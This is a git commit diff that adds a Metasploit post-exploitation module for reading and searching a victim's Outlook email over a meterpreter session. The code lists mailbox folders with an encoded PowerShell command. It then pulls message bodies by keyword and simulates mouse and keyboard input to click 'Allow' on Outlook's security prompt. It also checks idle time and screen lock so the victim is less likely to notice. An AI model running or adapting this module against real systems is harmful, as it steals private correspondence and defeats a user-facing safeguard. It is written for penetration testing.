Add Windows post module for reading/searching Outlook e-mail

wez3 · wez3 · commit 7a2b7208e72d · 2014-11-17T19:38:55.000+01:00
diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb
@@ -0,0 +1,153 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/registry'
+require 'iconv'
+require 'base64'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Windows::Registry
+
+        A_HASH = { "en_US" => "Allow", "NL" => "Toestaan" }
+        ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor" }
+
+	def initialize(info={})
+		super(update_info(info,
+		'Name'          => 'Windows gather/search Outlook e-mailmessages',
+		'Description'   => %q{
+			This module allows you to read and search e-mailmessages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
+			If a victim is behind the target system, he might detect your activity. Tested on Windows 8.1 x64 with Office 2013.
+		},
+		'License'       => MSF_LICENSE,
+		'Author'        => [ 'Wesley Neelen <security[at]forsec.nl>' ],
+		'Platform'      => [ 'win' ],
+		'Arch'		=> [ 'x86', 'x64' ],
+		'SessionTypes'  => [ 'meterpreter']
+	))
+
+	register_options(
+	[
+		OptBool.new('LIST_FOLDERS', [ true, ' List the available folders', true]),
+		OptString.new('FOLDER', [ false, ' The e-mailfolder to read (e.g. Inbox)' ]),
+		OptString.new('KEYWORD', [ false, ' Search e-mails by the keyword specified here' ]),
+		OptString.new('A_TRANSLATION', [ false, ' Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
+		OptString.new('ACF_TRANSLATION', [ false, ' Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
+		], self.class)
+	end
+
+
+	def listBoxes
+		# This function prints a listing of available mailbox folders
+		listBoxes_res = cmd_exec('powershell', '-enc ZgB1AG4AYwB0AGkAbwBuACAATABpAHMAdAAtAEYAbwBsAGQAZQByACAAewAKACAAIAAgACAAQwBsAGUAYQByAC0AaABvAHMAdAAKACAAIAAgACAAQQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkAIAAiAE0AaQBjAHIAbwBzAG8AZgB0AC4ATwBmAGYAaQBjAGUALgBJAG4AdABlAHIAbwBwAC4ATwB1AHQAbABvAG8AawAiAAoAIAAgACAAIAAkAE8AdQB0AGwAbwBvAGsAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABPAHUAdABsAG8AbwBrAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuAAoAIAAgACAAIAAkAE4AYQBtAGUAcwBwAGEAYwBlACAAPQAgACQATwB1AHQAbABvAG8AawAuAEcAZQB0AE4AYQBtAGUAUwBwAGEAYwBlACgAIgBNAEEAUABJACIAKQAKACAAIAAgACAAJABOAGEAbQBlAFMAcABhAGMAZQAuAEYAbwBsAGQAZQByAHMALgBJAHQAZQBtACgAMQApAC4ARgBvAGwAZABlAHIAcwAgAHwAIABGAFQAIABGAG8AbABkAGUAcgBQAGEAdABoAAoAfQAKAAoATABpAHMAdAAtAEYAbwBsAGQAZQByAAoA')
+		currentidle = session.ui.idle_time
+		print_status("System has currently been idle for #{currentidle} seconds")
+		print_status listBoxes_res
+	end
+
+	def readEmails(folder,keyword,searchobject,atrans,acftrans)
+		# This functions reads Outlook using powershell scripts
+		view = framework.threads.spawn("ButtonClicker", false) {
+			clickButton(atrans,acftrans)
+		}
+		psh_script = "function Get-Emails {\n"
+    		psh_script += "	param ([String]$searchTerm,[String]$Folder,[String]$searchObject)\n"
+    		psh_script += "	Add-Type -Assembly \"Microsoft.Office.Interop.Outlook\"\n"
+    		psh_script += "	$Outlook = New-Object -ComObject Outlook.Application\n"
+    		psh_script += "	$Namespace = $Outlook.GetNameSpace(\"MAPI\")\n"
+    		psh_script += "	$NameSpace.Folders.Item(1)\n"
+   		psh_script += "	$Email = $NameSpace.Folders.Item(1).Folders.Item($Folder).Items\n"
+    		psh_script += " $Email | Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'}\n"
+		psh_script += " Write-Host $Email\n"
+		psh_script += "}\n"
+		psh_script += "\n"
+		psh_script += "Get-Emails \"" + keyword + "\" \"" + folder + "\" \"" + searchobject + "\"\n"
+		utf16conv = Iconv.conv('UTF16LE', 'ASCII', psh_script)
+		encoded_psh = Base64.encode64(utf16conv)
+		readEmails_res = cmd_exec('powershell', '-enc ' + encoded_psh)
+		print_status readEmails_res
+	end
+
+	def clickButton(atrans,acftrans)
+		# This functions clicks on the security notification generated by Outlook.
+		sleep 1
+		hwnd = client.railgun.user32.FindWindowW(nil, "Microsoft Outlook")
+		hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
+		client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
+		client.railgun.user32.MoveWindow(hwnd['return'],150,150,1,1,true)
+		hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
+		client.railgun.user32.SetActiveWindow(hwndChild['return'])
+		client.railgun.user32.mouse_event(0x0002,150,150,nil,nil)
+		client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
+	end
+
+	def run
+		# Main method
+		list_folder = datastore['LIST_FOLDERS']
+		folder	= datastore['FOLDER']
+		keyword = datastore['KEYWORD']
+		object	= "HTMLBody"
+		allow 	= datastore['A_TRANSLATION']
+		allow_access_for = datastore['ACF_TRANSLATION']
+
+		if keyword.nil?
+			keyword = ""
+		end
+
+		# OS language check 
+		sysLang = client.sys.config.sysinfo['System Language']
+		if sysLang != "en_US" and sysLang != "NL"
+			if allow.nil? or allow_access_for.nil?
+				print_error ("System language not supported, only English (en-US) and Dutch (NL) are supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)")
+				return :abort
+			else
+				atrans = allow
+				acftrans = allow_access_for
+			end
+		else
+			atrans = A_HASH[sysLang]
+			acftrans = ACF_HASH[sysLang]
+		end
+		
+		# Outlook installed
+		@key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" 
+		outlookInstalled = registry_getvaldata("#{@key_base}\\", "NextAccountID")
+
+		if outlookInstalled != 0
+			print_good "Outlook is installed"
+		else
+			print_error "Outlook is not installed"
+			return :abort
+		end
+
+		# Powershell installed check
+		if registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
+			print_good("Powershell is installed on this system.")
+		else
+			print_error("Powershell is not installed")
+			return :abort
+		end	
+			
+		# Check whether target system is locked
+		locked = client.railgun.user32.GetForegroundWindow()['return']
+		if locked == 0
+			print_error("Target system is locked. This post module cannot click on Outlooks security warning when the target system is locked")
+			return :abort
+		end
+
+		if list_folder
+			print_good('Available folders in the mailbox: ')
+			listBoxes()
+		else
+			print_status('Not printing folders, LIST_FOLDERS disabled')
+		end
+
+		if folder
+			readEmails(folder,keyword,object,atrans,acftrans)
+		end
+	end
+end
+
